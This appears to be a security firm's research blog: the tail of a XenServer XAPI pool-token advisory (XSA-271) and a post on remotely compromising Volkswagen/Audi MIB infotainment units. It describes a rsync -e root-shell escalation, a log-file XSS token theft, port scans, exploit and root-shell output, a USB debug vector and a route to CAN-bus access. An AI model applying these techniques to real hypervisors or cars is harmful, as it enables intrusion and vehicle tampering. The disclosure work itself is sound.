In this attack the malicious site would first perform a request that contains HTML and JavaScript in the URL, causing these to be written to a log file. In a second request, that logfile would then be loaded as a HTML page. The JavaScript on that page would then be able to read and exfiltrate the pool token and/or perform further requests using the pool token, something JavaScript on a random website on the internet would not normally be able to do because of the single origin policy enforced by web browsers.

This attack is overall much less practical than the DNS rebinding attack, and we have not investigated it further. The only advantage this attack has is that it could still work even if the XAPI was only available over HTTPS (DNS rebinding is in general not possible over HTTPS because the hostname will be validated by the TLS connection setup even if the HTTP server itself does not).

Obtaining a root shell on Dom0

While the pool token is sufficient to perform most actions on the hypervisor, an attacker is still restricted by the operations that the XAPI supports.

To determine the full impact we investigated whether it was possible to obtain full remote shell access as the operating system “root” user with this pool token. If so, it makes the impact story a good deal simpler: remote shell access as root means complete control, period.

As it turns out, it is possible to abuse the /remotecmd endpoint for this. The code for this endpoint is located in /ocaml/xapi/

let allowed_cmds = ["rsync","/usr/bin/rsync"]

(* Handle URIs of the form: vmuuid:port *)
let handler (req: Http.Request.t) s _ =
  let q = req.Http.Request.query in
  debug "remotecmd handler running";
  Xapi_http.with_context "Remote command" req s
    (fun __context ->
       let session_id = Context.get_session_id __context in
       if not (Db.Session.get_pool ~__context ~self:session_id) then
           failwith "Not a pool session"
       let cmd=List.assoc "cmd" q in
       let cmd=List.assoc cmd allowed_cmds in
       let args = snd (List.filter (fun (x,y) -> x="arg") q) in
       do_cmd s cmd args

This appears to restrict the command to be executed to only rsync, but since rsync supports the -e option that lets you execute arbitrary shell commands anyway this restriction is not actually effective. Its unclear whether this constitutes a separate vulnerability, since there are plenty of other ways to abuse rsync to gain remote shell access (overwriting various config files or shellscripts, for example.)

This endpoint and the associated ability to execute shell commands is only available to ‘pool sessions’ (i.e. administrative sessions started by other nodes in the same pool), but because we have stolen the pool token we can produce such a session just by passing the stolen token in the right parameter.

Even though a complete exploit is deliberately not provided here, the core vulnerability is simple enough that an attacker will be able to exploit it with a minimum of effort.

Mitigating factors

Computest recommends verifying that none of the IPs assigned to the Dom0 are reachable from less-trusted networks (including the virtual networks assigned to the hosted virtual machines). While this is a best practice, it should not be considered a complete fix for this issue (especially considering the DNS rebinding concerns, which might provide an alternative route of attack).

Xen has noted that some versions of XenServer do not immediately create the /var/update directory on installation. Since the vulnerability can only be exploited when this directory exists, those versions will not be vulnerable directly after installation but will become vulnerable when installing their first update.

It is possible to prevent exploitation of this issue by moving the /var/update directory elsewhere and creating a file named /var/update to prevent the automatic creation of this directory. This will prevent the update functionality from working and may have further negative impact. It is not recommended by us, by Citrix, or by the Xen project, and we take no responsibility for problems caused by doing this.


Xen has released a patch for the primary XAPI vulnerability under XSA-271 and has incorporated the fix in future XAPI versions.

Citrix will shortly publish or has published updates for supported XenServer releases 7.1 LTSR, 7.4 CR and 7.5 CR. Notably, no update will be published for version 7.3, which is out of support since June.

If you use either of these products you are advised to upgrade immediately.

Various cloud providers and other members of the Xen security pre-release list have received information about this vulnerability before the public release according to Xen’s usual policy (see also the timeline at the bottom of this document). If they were using XAPI they were able to apply the fix early.

If there is a risk that credentials stored on the dom0 or any of the VMs hosted by the hypervisor may have been compromised they should be changed.

There was previously no documented way of rotating the pool token, so Xen has provided the following steps to change it if deemed necessary.

  1. On all pool members, stop Xapi:

    service xapi stop
  2. On the pool master:

    rm /etc/xensource/ptoken
    /opt/xensource/libexec/genptoken -f -o /etc/xensource/ptoken
  3. Copy /etc/xensource/ptoken to all pool slaves

  4. On the pool master, restart the toolstack:

  5. On all pool slaves, restart the toolstack:


Note that rotating credentials (including the pool token) is not sufficient to lock out an attacker who has already established an alternative means of control. The above steps are only intended as a possible extra layer of assurance when there is already reasonable confidence that no attack happened, or possibly as part of making a “known good” backup from before an attack safe for use.


Xen and Citrix have responded quickly to patch the issue. However, older versions of XenServer remain without a patch, and upgrading XenServer may not be easy for some users because some features are no longer supported in the free version distributed by Citrix.

In response to the miscellaneous concerns raised in this document Xen has documented a new procedure to change the pool token if desired, but we have had no clear indication of whether other things such as the DNS rebinding aspect will be addressed in the future.

The unexpected discovery of this vulnerability during a basic software quality review shows once again that it’s more than worth it to spend some extra time during network design to lock down and segregate management services. Especially since the consequences of bugs in such basic infrastructure can be disastrous and patching is often complicated.

In our opinion the XAPI service does not take a very principled approach in its HTTP and authentication layers, which provided room for this bug and some of the other things we mentioned when investigating the impact of this vulnerability.


2018-07-04 Disclosure of our draft to Xen and Citrix security teams
2018-07-05 First response from the Xen security team, XSA-271 assigned
2018-07-05 First response from the Citrix security team
2018-07-17 Xen proposes embargo date of 2017-08-14
2018-07-20 Agreed to set embargo date at 2018-08-14
2018-07-30 Received draft of Xen’s advisory
2018-07-31 Xen sends its advisory to its pre-release partners
2018-08-14 Public release of advisories

Volkswagen Auto Group MIB infotainment system - unauthenticated remote code execution as root

19 July 2018 at 00:00


Our world is becoming more and more digital, and the devices we use daily are becoming connected more and more. Thinking of IoT products in domotics and healthcare, it’s easy to find countless examples of how this interconnectedness improves our quality of life.

However, these rapid changes also pose risks. In the big rush forward, we as a society aren’t always too concerned with these risks until they manifest themselves. This is where the hacker community has taken an important role in the past decades: using curiosity and skills to demonstrate that the changes in the name of progress sometimes have a downside that we need to consider.

At Computest, our mission is to improve the quality of the software that surrounds us. While we normally do so through services and consulting to our customers, R&D projects play an important role as well. In 2017 we put significant R&D effort in vehicle security. We chose this topic for a number of reasons, besides it being an interesting topic from a technical point of view. For one because we saw more and more cars in our car park with internet connectivity, often without a convenient mechanism to receive or apply security updates. This ecosystem reminded us of other IoT systems, where we face similar problems concerning remote maintenance. We were interested to see how these effect the current state of security in the automotive vehicle industry. We also felt that this research topic would not only be of interest to us, but would also make the world a little bit safer in an industry that effects us all. Lastly this topic would of course allow us to demonstrate our expertise in the field. This post describes our research approach, the research itself and its findings, the disclosure process with the manufacturer and finally our conclusions.

We are not the first to investigate the current state of security in automotive vehicles, the research of Charlie Miller and Chris Valasek being the most prominent example. They found that the IVI (In-Vehicle Infotainment) system in their car suffered from a trivial vulnerability, which could be reached via the cellular connection because it was unfirewalled. We wanted to see if anything had changed since then, or if the same attack strategy might also succeed to other cars as well.

For this research, we looked at different cars from different models and brands, with the similarity that all cars had internet connectivity. In the end, we focused our research on one specific in-vehicle infotainment (IVI) system, that is used in most cars from the Volkswagen Auto Group and often referred to as MIB. More specifically, in our research we used a Volkswagen Golf GTE and an Audi A3 e-tron.

At Computest we believe in public disclosure of identified vulnerabilities as users should be aware of the risks related to use a specific product or service. But at all times we also consider it our responsibility that nobody is put at unnecessary risk and also no unnecessary damage is caused by such a disclosure.

The vulnerabilities we identified are all software-based, and therefore could be mitigated via a firmware upgrade. However, this cannot be done remotely, but must be done by an official dealer which makes upgrading the entire fleet at once difficult.

Based on above we decided to not provide a full disclosure of our findings in this post. We describe the process we followed, our attack strategy and the system internals, but not the full details on the remote exploitable vulnerability as we would consider that being irresponsible. This might disappoint some readers, but we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

This is also why we first informed the manufacturer about the vulnerability and disclosed all our findings to them, gave them the chance to review this research post and also provide a related statement which we would incorporate into this document. We have received feedback on the research post beginning of February 2018. Prior to release of this research post, Volkswagen sent us the letter that is attached to this post confirming the vulnerabilities. In this letter they also state that the vulnerabilities have been fixed in an update to the infotainment system, which means that new cars produced since the update are not affected by the vulnerabilities we found.

Car anatomy

A modern-day vehicle is much more connected than meets the eye. In the old days, cars were mostly mechanical vehicles that relied on mechanics for functionality like steering and braking to operate. Modern vehicles mostly rely on electronics to control these systems. This is often referred to by drive by wire, and has several advantages over the traditional mechanical approach. Several safety features are possible because components are computer controlled. For example, some cars can and will brake automatically if the front radar detects an obstacle ahead and thinks collision is inevitable. Drive by wire is also used for some luxury functionalities such as automatic parking, by electronically taking over the steering wheel based on radar/camera footage.

All these new functionalities are possible because every component in a modern car is hooked up to a central bus, which is used by components to exchanges messages. The most common bus system is the CAN (Control Area Network) bus, which is present in all cars built since the nineties. Nowadays it controls everything, from steering to unlocking the doors to the volume knob on the radio.

The CAN protocol itself is relatively straight forward. In basis, each message has an arbitration ID and a payload. There is no authentication, authorization, signing, encryption etc. Once you are on the bus you can send arbitrary messages, which will be received by all parties connected to the same bus. There is also no sender or recipient information, each component can decide for itself if a specific message does apply to them.

In theory, this means that if an attacker would gain access to the CAN bus of a vehicle, he or she would control the car. They could impersonate the front radar for example to instruct the braking system to make an emergency stop due to a near collision or take over the steering. The attacker only needs to find a way to actually get access to a component that is connected to the CAN bus, without physical access.

The attacker has a lot of remote attack surface to choose from. Some of them require close proximity to the car, while others are reachable from anywhere around the globe. Some of the vectors will require user interaction, whereas others can be attacked unknowingly to its passengers.

For example, modern cars have a system for monitoring tire pressure, called TPMS (Tire Pressure Monitoring System), which will notify the driver if one of the tiers has a low pressure. This is a wireless system, where the tire will communicate its active pressure either via radio signals or Bluetooth to a receiver inside the car. This receiver will, in turn, notify other components via a message on the CAN bus. The instrument cluster will receive this message and as a response turn on the appropriate warning light. Another example is the key fob that will communicate wirelessly with a receiver in your car, which in its turn will communicate with the locks in the door and with the immobilizer in the engine. All these components have two things in common: they are connected to the CAN bus, and have remote attack surface (namely the receiver).

Modern cars have two main ways of protection against malicious CAN messages. The first is the defensive behavior of all components in a car. Each component is designed to always choose the safest option, in order to protect against components that might be malfunctioning. For example, automatic steering for automatic parking might be disabled by default, only to be enabled when the car is in reverse and at a low speed. And if another, malicious, device on the bus impersonates the front-radar to try to trigger an emergency stop, the real front-radar will continue to spam the bus with messages that the road is clear.

The second protection mechanism is that a modern car has more than one CAN bus, separating safety critical devices from convenience devices. The brakes and engine for example are connected to a high-speed CAN bus, while the air conditioning and windscreen wipers are connected to a separated (and most likely low-speed) CAN bus. In theory these busses should be completely separated, in practice however they are often connected via a so-called gateway. This is because there are circumstances were data must flow from the low-speed to the high-speed CAN bus and vice-versa. For example, the door locks must be able to communicate to the engine to enable and disable the immobilizer, and the IVI system receives status information and error codes from the engine to show on the central display. Firewalling these messages is the responsibility of the gateway, it will monitor every message from every bus and decides which messages are allowed to pass through.

In the last few years we have seen an increase in cars that feature an internet connection, we even have seen cars that have two cellular connections at once. This connection can for example be used by the IVI system to obtain information, such as maps data, or to offer functionalities like an internet browser or a Wi-Fi hotspot or to give owners the ability to control some features via a mobile app. For example, to remotely start the central heating to preheat the car, or by being able to remotely lock/unlock your car. In all situations, the device that has the cellular connection is also hooked up to the CAN bus, which makes it theoretically possible to remotely compromise a vehicle.

This attack vector is not just theory, there have been researchers in the past that succeeded in this goal. Some of these attacks were possible because the cellular connection was not firewalled and had a vulnerable service listening, others relied on the fact that the user would visit an attacker-controlled webpage on the in-car browser and exploited a vulnerability in the rendering engine.

Research goal

A modern car has many remote vectors, such as Bluetooth, TPMS and the key fob. But most vectors require that the attacker is in close proximity to the victim. However, for this research we specifically focused on attack vectors that could be triggered via the internet and without user interaction. Once we would have found such a vector, our goal was to see if we could use this vector to influence either driving behavior or other critical safety components in the car. In general, this would mean that we wanted to gain access to the high-speed CAN bus, which connects components like the brakes, steering wheel and the engine.

We chose the internet vector above others, because such an attack would further illustrate our point of the risks that are involved with the current eco-system. All other vectors require being physically close to the car, making the impact typically limited to only a handful of cars at a time.

We formulated the following research question: “Can we influence the driving behavior or critical security systems of a car via an internet attack vector?”.

Research approach

We started this research with nine different models, from nine different brands. These were all lease cars belonging to employees of Computest. Since we are not the actual owner of the car we asked permission for conducting this research beforehand from both our lease company and the employee driving the car.

We conducted a preliminary research in which we mapped the possible attack vectors of each car. Determining the attack vectors was done by looking at the architecture, reading public documentation and by a short technical review.

Things we were specify searching for:

  • cars with only a single or few layers between the cellular connection and the high-speed CAN bus;
  • cars which allowed us to easily swap SIM cards (since we are not the owner of the cars, soldering, decapping etc. is undesirable);
  • cars that offered a lot of services over cellular or Wi-Fi.

From here we choose the car which we thought would give us the highest chance of success. This is of course subjective and does not guarantee success. For some models getting initial access might be easier than others, but this does say nothing about the effort required for lateral movement.

We finally settled for the Volkswagen Golf GTE as our primary target. We later added the Audi A3 e-tron to our research. Both vehicles share the same IVI-system which, on first sight, seemed to have a broad attack surface, increasing the chance of finding an exploitable vulnerability.

Research findings

Initial access

We started our research initially with a Volkswagen Golf GTE, from 2015, with the Car-Net app. This car has a IVI system manufactured by Harman, referred to as the modular infotainment platform (MIB). Our model was equipped with the newer version (version 2) of this platform, which had several improvements from the previous version (such as Apple CarPlay). Important to note is that our model did not have a separate SIM card tray. We assumed that the cellular connection used an embedded SIM, inside the IVI system, but this assumption would later turn out to be invalid.

The MIB version installed in the Volkswagen Golf has the possibility to connect to a Wi-Fi network. A quick port scan on this port shows that there are many services listening:

$ nmap -sV -vvv -oA gte -Pn -p-
Starting Nmap 7.31 ( ) at 2017-01-05 10:34 CET
Host is up, received user-set (0.0061s latency).
Not shown: 65522 closed ports
Reason: 65522 conn-refused
23/tcp    open     telnet          syn-ack     Openwall GNU/*/Linux telnetd
10123/tcp open     unknown         syn-ack
15001/tcp open     unknown         syn-ack
21002/tcp open     unknown         syn-ack
21200/tcp open     unknown         syn-ack
22111/tcp open     tcpwrapped      syn-ack
22222/tcp open     easyengine?     syn-ack
23100/tcp open     unknown         syn-ack
23101/tcp open     unknown         syn-ack
25010/tcp open     unknown         syn-ack
30001/tcp open     pago-services1? syn-ack
32111/tcp open     unknown         syn-ack
49152/tcp open     unknown         syn-ack

Nmap done: 1 IP address (1 host up) scanned in 259.12 seconds

There is a fully functional telnet service listening, but without valid credentials, this seemed like a dead end. An initial scan did not return any valid credentials, and as it later turned out they use passwords of eight random characters. Some of the other ports seemed to be used for sending debug information to the client, like the current radio station and current GPS coordinates. Port 49152 has a UPnP service listening and after some research it was clear that they use PlutinoSoft Platinum UPnP, which is open source. This service piqued our interest because this exact service was also found on the Audi A3 (also from 2015). This car however had only two open ports:

$ nmap -p- -sV -vvv -oA a3 -Pn
Starting Nmap 7.31 ( ) at 2017-01-04 11:09 CET
Nmap scan report for
Host is up, received user-set (0.013s latency).
Not shown: 65533 filtered ports
Reason: 65533 no-responses
53/tcp    open   domain  syn-ack      dnsmasq 2.66
49152/tcp open   unknown syn-ack

Nmap done: 1 IP address (1 host up) scanned in 235.22 seconds

We spent some time reviewing the UPnP source code (but by no means was this a full audit) but didn’t find an exploitable vulnerability.

We initially picked the Golf as primary target because it had more attack surface, but this at least showed that the two systems were built upon the same platform.

After further research, we found a service on the Golf with an exploitable vulnerability. Initially we could use this vulnerability to read arbitrary files from disk, but quickly could expand our possibilities into full remote code execution. This attack only worked via the Wi-Fi hotspot, so the impact was limited. You have to be near the car and it must connect with the Wi-Fi network of the attacker. But we did have initial access:

$ ./exploit
[+] going to exploit
[+] system seems vulnerable...
[+] enjoy your shell:
uname -a
QNX mmx 6.5.0 2014/12/18-14:41:09EST nVidia_Tegra2(T30)_Boards armle

Because there is no mechanism to update this type of IVI remotely, we made the decision not to disclose the exact vulnerability we used to gain initial access. We think that giving full disclosure could put people at risk, while not adding much to this post.


The system we had access to identified itself as MMX. It runs on the ARMv7a architecture and uses the QNX operating system, version 6.5.0. It is the main processor in the MIB system and is responsible for things like screen compositing, multimedia decoding, satnav etc.

We noticed that the MMX unit was responsible for the Wi-Fi hotspot functionality, but not for the cellular connection that was used for the Car-Net app. However, we did find an internal network. Finding out what was on the other end was the next step in our research.

# ifconfig mmx0
 address: 00:05:04:03:02:01
 media: <unknown type> autoselect
 inet netmask 0xffffff00 broadcast
 inet6 fe80::205:4ff:fe03:201%mmx0 prefixlen 64 scopeid 0x3

One of the problems we faced was the lack of tools on the system and the lack of a build chain to compile our own. For example, we couldn’t get a socket or process list due this. The QNX operating system and build-chain is commercial software, for which we didn’t have a license. At first, we tried to work with the tools that were already present. For example, we relied on a broadcast ping for host discovery, and used the included ftp client for a portscan (which took ages). While cumbersome, we found one other host alive on this network. Eventually we applied for a trial version of QNX. Not expecting much of this we continued our research. But, after a few weeks our application got through, and we received a demo license. Which meant we had access to standard tools like telnet and ps, as well as a build chain.

The device on the other end identified itself as RCC, and also had a telnet service running. We tried logging in using the same credentials, but this initially failed. After further investigating MMX’s configuration it became apparent that MMX and RCC share their filesystems, using Qnet; a QNX proprietary protocol. MMX and RCC are allowed to spawn processes on each other and read files (such as the shadow file). It even turned out that the shadow file on RCC was just a symlink to the shadow file on MMX. It seemed that the original telnet binary did not fully function, causing the password reject message. After some rewriting everything worked as expected.

# /tmp/telnet
Connected to
Escape character is '^]'.

QNX Neutrino (rcc) (ttyp0)

login: root

     ___           _ _   __  __ ___ _____
    /   |_   _  __| (_) |  \/  |_ _|  _  \
   / /| | | | |/ _  | | | |\/| || || |_)_/
  / __  | |_| | (_| | | | |  | || || |_) \
 /_/  |_|__,__|\__,_|_| |_|  |_|___|_____/

/ > ls –la
total 37812
lrwxrwxrwx  1 root      root             17 Jan 01 00:49 HBpersistence -> /mnt/efs-persist/
drwxrwxrwx  2 root      root             30 Jan 01 00:00 bin
lrwxrwxrwx  1 root      root             29 Jan 01 00:49 config -> /mnt/ifs-root/usr/apps/config
drwxrwxrwx  2 root      root             10 Feb 16  2015 dev
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 eso
drwxrwxrwx  2 root      root             10 Jan 01 00:00 etc
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 hbsystem
lrwxrwxrwx  1 root      root             20 Jan 01 00:49 irc -> /mnt/efs-persist/irc
drwxrwxrwx  2 root      root             20 Jan 01 00:00 lib
drwxrwxrwx  2 root      root             10 Feb 16  2015 mnt
dr-xr-xr-x  1 root      root              0 Jan 01 00:37 net
drwxrwxrwx  2 root      root             10 Jan 01 00:00 opt
dr-xr-xr-x  2 root      root       19353600 Jan 01 00:49 proc
drwxrwxrwx  2 root      root             10 Jan 01 00:00 sbin
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 scripts
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 srv
lrwxrwxrwx  1 root      root             10 Feb 16  2015 tmp -> /dev/shmem
drwxr-xr-x  2 root      root             10 Jan 01 00:00 usr
dr-xr-xr-x  2 root      root              0 Jan 01 00:49 var
/ >


The RCC unit is a separate chip on the MIB system. The MIB IVI is a modular platform, were they separated all the multimedia handling from the low-level functions. The MMX (multimedia applications unit) processor is responsible for things like the satnav, screen and input control, multimedia handling etc. While the RCC (radio and car control unit) processor handles the low-level communication.

RCC runs on the same version of QNX. It has even fewer tools available, and only a few hundred kilobytes of ram. But because of the Qnet protocol it is possible to run all tools from the MMX unit on RCC.

Communication with the lower level components, like DAB+, CAN, AM/FM decoding etc. are handled via serial connections; either SPI or I2C. The various configuration options can be found under /etc/.


We expected to find a cellular connection on RCC, but we did not. After further research it turned out that the Car-Net functionality is offered by a completely separate unit, and not the IVI. The cellular connection in the Golf is connected to a box which is located behind the instrument cluster, as is shown below.

The Car-Net box uses an embedded SIM card. Since this box offered no other interface options, and we couldn’t make any physical changes to the car (to see if JTAG was available for example), we did not investigate any further.

Audi A3

From here we decided to put our effort back into the Audi A3. It uses the same IVI system, but used a higher-end version. This version has a physical SIM card, which is used by the Audi connect service. We of course already did a port scan via the Wi-Fi hotspot, which turned out empty, but it might be that the results would be different via the cellular connection.

To test this, we needed to be able to do a port scan on the remote interface. This can either be done if the ISP assigns a public routable IPv4 address (unfirewalled), allows client-to-client communication or by using a hacked femtocell. We chose the first option by using a functionality offered by one of the largest ISPs in the Netherlands. They will assign a public IPv4 address if you change certain APN settings. A portscan on this public IP address gave completely different results than our earlier portscan on the Wi-Fi interface:

$ nmap -p0- -oA md -Pn -vvv -A
Starting Nmap 7.31 ( ) at 2017-04-03 09:14:54 CET
Host is up, received user-set (0.033s latency).
Not shown: 65517 closed ports
Reason: 65517 conn-refused
23/tcp    open     telnet     syn-ack     Openwall GNU/*/Linux telnetd
10023/tcp open     unknown    syn-ack
10123/tcp open     unknown    syn-ack
15298/tcp filtered unknown    no-response
21002/tcp open     unknown    syn-ack
22110/tcp open     unknown    syn-ack
22111/tcp open     tcpwrapped syn-ack
23000/tcp open     tcpwrapped syn-ack
23059/tcp open     unknown    syn-ack
32111/tcp open     tcpwrapped syn-ack
35334/tcp filtered unknown    no-response
38222/tcp filtered unknown    no-response
49152/tcp open     unknown    syn-ack
49329/tcp filtered unknown    no-response
62694/tcp filtered unknown    no-response
65389/tcp open     tcpwrapped syn-ack
65470/tcp open     tcpwrapped syn-ack
65518/tcp open     unknown    syn-ack

Nmap done: 1 IP address (1 host up) scanned in 464 seconds

Most services are the same as those on the Golf. Some things may differ (like port numbers), possibly because the Audi has the older model of the MIB IVI system. But, more importantly: our vulnerable service is also reachable, and suffers from the same vulnerability!

An attacker can only abuse this vulnerability if the owner has the Audi connect service, and the ISP in the country of the owner allows client-to-client communication, or hands out public IPv4 addresses.

To summarize our research up to this point: we have remote code execution, via the internet, on MMX. From here we can control RCC as well. The next step would be to send arbitrary CAN messages over the bus to see if we can reach any safety critical components.

Renesas V850

The RCC unit is not directly connected to the CAN bus, it has a serial connection (SPI) to a separate chip that handles all CAN communication. This chip is manufactured by Renesas and uses the V850 architecture.

The firmware on this chip doesn’t allow for arbitrary CAN messages to be sent. It has an API that allows a select number of messages to be sent. Most likely, any vulnerabilities in the gateway would require us to send a message that is not on the list, meaning we need a way to let the Renesas chip send us arbitrary messages. The read functionality on the Renesas chip has been disabled, meaning that it is not possible to extract the firmware from the chip easily.

The MIB system does have a software update feature. For this an SD-card, USB stick or CD must be inserted which holds the new firmware. The update sequence is initiated by the MMX unit, which is responsible for the mounting and handling all removable media. When a new firmware image is found, the update sequence will commence.

The update is signed using RSA, but not encrypted. Signature validation is done by the MMX unit, which will then hand over the appropriate update files for RCC and the Renesas chip. The RCC and Renesas chip will trust that the MMX unit already has performed signature validation, and will thus not revalidate the signature for their new firmware. Updating the Renesas V850 chip can be initiated by the RCC unit (using mib2_ioc_flash).

Firmware images are hard to come by. They are only available for official dealers and not for end-users. However, if one can get a hold of the firmware image, it is theoretically possible to backdoor the original firmware image for the Renesas chip, to allow sending arbitrary CAN messages, and flash this new firmware from the RCC unit.

The figure below shows the attack chain up until this point:


By backdooring the Renesas chip we are able to send arbitrary CAN messages on the CAN bus. However, the CAN bus we are connected to is dedicated to the IVI system. It is directly connected to a CAN gateway; a physical device used to firewall/filter CAN messages between the different CAN busses.

The gateway is located behind the steering column and is connected with a single connector which has all the different busses connected.

The firmware for the gateway is signed, so backdooring this chip won’t work as it will invalidate the signature. Furthermore, reflashing the firmware is only possible from the debug bus (ODB-II port) and not from the IVI CAN bus. If we want to bypass this chip we need to find an exploitable vulnerability in the firmware. Our first step to achieve this would be to try to extract the firmware from the chip using a physical vector. However, after careful consideration we decided to discontinue our research at this point, since this would potentially compromise intellectual property of the manufacturer and potentially break the law.

USB vector

After finding the remote vector, we discovered a second vector we had not yet explored. For debugging purposes, the MMX unit recognizes a few USB-to-Ethernet dongles as debug interfaces, which will create an extra networking interface. It seems that this network interface will also serve the vulnerable service. The configuration can be found under /etc/usblauncher.lua:

-- D-Link DUB-E100 USB Dongles
device(0x2001, 0x3c05) {
    driver"/etc/scripts/ -oname=en,lan=0,busnum=$(busno),devnum=$(devno),phy_88772=0,phy_check,wait=60,speed=100,duplex=1,ign_remove,path=$(USB_PATH) /lib/dll/ /dev/io-net/en0";
    removal"ifconfig en0 destroy";

device(0x2001, 0x1a02) {
    driver"/etc/scripts/ -oname=en,lan=0,busnum=$(busno),devnum=$(devno),phy_88772=0,phy_check,wait=60,speed=100,duplex=1,ign_remove,path=$(USB_PATH) /lib/dll/ /dev/io-net/en0";
    removal"ifconfig en0 destroy";

-- SMSC9500
device(0x0424, 0x9500) {
    -- the script does an exec dhcp.client at the bottom, then usblauncher can slay the dhcp.client when the dongle is removed
    driver"/etc/scripts/ -olan=0,busnum=$(busno),devnum=$(devno),path=$(USB_PATH) /lib/dll/ /dev/io-net/en0";
    removal"ifconfig en0 destroy";

-- Germaneers LAN9514
device(0x2721, 0xec00) {
        -- the script does an exec dhcp.client at the bottom, then usblauncher can slay the dhcp.client when the dongle is removed
        driver"/etc/scripts/ -olan=0,busnum=$(busno),devnum=$(devno),path=$(USB_PATH) /lib/dll/ /dev/io-net/en0";
        removal"ifconfig en0 destroy";

But even without this service, telnet is also enabled. The version of QNX that is being used only supports descrypt() for password hashing, which has an upper limit of eight characters. One could use a service like which can search the entire key space in less than three days using FPGA’s, for only $ 100,-. We found out that the passwords are changed between models/versions; but we think it is doable, both in time and money, to build a dictionary containing all passwords of all different versions of the MIB IVI.

This vector seems to work on all models that use the MIB IVI system, regardless of the version. Since VAG has multiple car brands, components like the IVI are often reused between brands. This vector will therefore most likely also work on cars from, for example, Seat and Skoda.

We tested this vector by changing some kernel parameters on a Nexus 5 phone. This can be done without the need for reflashing, only root privileges are required. After plugging in the phone, it will be recognized as an Ethernet dongle, and the MMX unit will initialize a debug interface.

Disclosure process

At Computest we believe in public disclosure of identified vulnerabilities as users should be aware of the risks related to use a specific product or service. But at all times we also consider it our responsibility that nobody is put at unnecessary risk and also no unnecessary damage is caused by such a disclosure. That means we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

As recommended we decided to contact the manufacturer as soon as we had verified and documented our findings. To do so we were looking for a specific Responsible Disclosure Policy (RDP) on the website of the manufacturer to understand how such a disclosure should be handled from their point of view.

As Volkswagen apparently did not have such a RDP in place, we followed the public Whistleblower System of Volkswagen and contacted the mentioned external lawyer they listed. Opposite to a typical whistleblower disclosure we had no interest nor reason to stay anonymous and disclosed our identity from the very beginning.

With the help of the external lawyer we got in contact with the quality assurance department of the Volkswagen Group mid of July 2017. After some initial conference calls we decided together that a face-to-face meeting would be the best format to disclose our findings and Volkswagen invited us to visit their IT center in Wolfsburg which we followed end of August 2017.

Obviously, Volkswagen required some time to investigate the impact and to perform a risks assessment. At the end of October we received their final conclusion, that they were not going to publish a public statement themselves. But were willing to review our research post to check whether we have stated the facts correctly and we have received the review at the beginning of February 2018. In April 2018, just prior to release of this post, Volkswagen provided us with a letter that confirms the vulnerabilities, and mentions that they have been fixed in a software update to the infotainment system. This means that cars produced since this update are not affected by the vulnerabilities we found. The letter is attached to this report. But based on our experience, it seems that cars which have been produced before are not automatically updated when being serviced at a dealer, thus are still vulnerable to the described attack

When writing this post, we decided to not provide a full disclosure of our findings. We describe the process we followed, our attack strategy and the system internals, but not the full details on the remote exploitable vulnerability as we would consider that being irresponsible. This might disappoint some readers, but we are fully committed to a responsible disclosure policy and are not willing to compromise on that.

In addition to the above we would like to mention that we have consulted an experienced legal advisor early on in this project to make sure our approach and actions are reasonable, and to assess potential (legal) consequences.

Future work

The current chain of attack only allows for the sending and receiving of CAN messages on an isolated CAN bus. As this bus is strictly separated from the high-speed CAN bus via a gateway, the current attack vector poses no direct threat to driver safety.

However, if an exploitable vulnerability in the gateway were to be found, the impact would significantly increase. Future research could focus on the security of the gateway, to see if there is any way to either bypass or compromise this device. There are still some attack vectors on the gateway that are definitely worth exploring. However, this should only be explored in cooperation with the manufacturer.

We are also looking into extending our research to other cars. We still have some interesting leads from our preliminary research that we could follow.


Internet-connected cars are rapidly becoming the norm. As with many other developments, it’s a good idea to sometimes take a step back and evaluate the risks of the path we’ve taken, and whether course adjustments are needed. That’s why we decided to pay attention to the risks related to internet-connected cars. We set out to find a remotely exploitable vulnerability, which required no user interaction, in a modern-day vehicle and from there influence either driving behavior or a safety feature.

With our research, we have shown that at least the first is possible. We can remotely compromise the MIB IVI system and from there send arbitrary CAN messages on the IVI CAN bus. As a result, we can control the central screen, speakers and microphone. This is a level of access that no attacker should be able to achieve. However, it does not directly affect driving behavior or any safety system due to the CAN gateway. The gateway is specifically designed to firewall CAN messages and the bus the IVI is connected to is separated from all other components. Further research on the security of the gateway was consciously not pursued.

We argue that the threat of an adversary with malicious intent was long underestimated. The vulnerability we initially identified should have been found during a proper security test. During our meeting with Volkswagen, we had the impression that the reported vulnerability and especially our approach was still unknown. We understood in our meeting with Volkwagen that, despite it being used in tens of millions of vehicles world-wide, this specific IVI system did not undergo a formal security test and the vulnerability was still unknown to them. However, in their feedback for this post Volkswagen stated that they already knew about this vulnerability.

Speaking with people within the industry we are under the impression that attention on security and awareness is growing, but with the efforts mainly focusing on the models still in development. Component manufactures producing critical components such as brakes, already had security high up in their quality assurance agenda. This focus was not because of the fear of adversaries on the CAN bus, but mainly to protect against component malfunction, which could otherwise result in situations like unintended acceleration.

A remote adversary is new territory for most industrial component manufacturers, which, to be mitigated effectively, requires embedding security in the software development lifecycle. This is a movement that was started years ago in the AppSec world. This is easier in an environment with automatic testing, continuous deployment and possibility to quickly apply updates after release. This is not always possible in the hardware industry, due to local regulations and the ecosystem. It often requires coordination between many vendors. But, if we want to protect future cars, these are problems we have to solve.

However, what about the cars of today, or cars that were shipped last week? They often don’t have the required capabilities (such as over-the-air updates) but will be on our roads for the next fifteen years. We believe they currently pose the real threat to their owners, having drive by wire technology in cars that are internet-connected without any way to reliably update the entire fleet at once.

We believe that the car industry in general, since it isn’t traditionally a software engineering industry, needs to look to other industries and borrow security principles and practices. Looking at mobile phones for instance, the car industry can take valuable lessons regarding trusted execution, isolation and creating an ecosystem for rapid security patching. For instance, components in a car that are remotely accessible, should be able to receive and apply verified security updates without user interaction.

We understand that component malfunction is a higher threat in day-to-day operation. We also understand that having an internet-connected car has its advantages, and we also not trying to reverse this trend. However, we can’t ignore the threats accompanied with today’s internet-connected world.


Based on our findings documented in this research post and our overall experience in IoT security we would like to conclude this post with some recommendations to manufacturers, consumers and ethical hackers.

Recommendations for manufacturers

  • The growing number of connected consumer devices is not only providing tremendous opportunities, but also comes along with additional risks which need to be taken care of. The quality of produced goods is not only about mechanical functionality and quality of materials used, but the quality and security of the embedded software is equally important and therefore requires equal attention in terms of quality assurance.
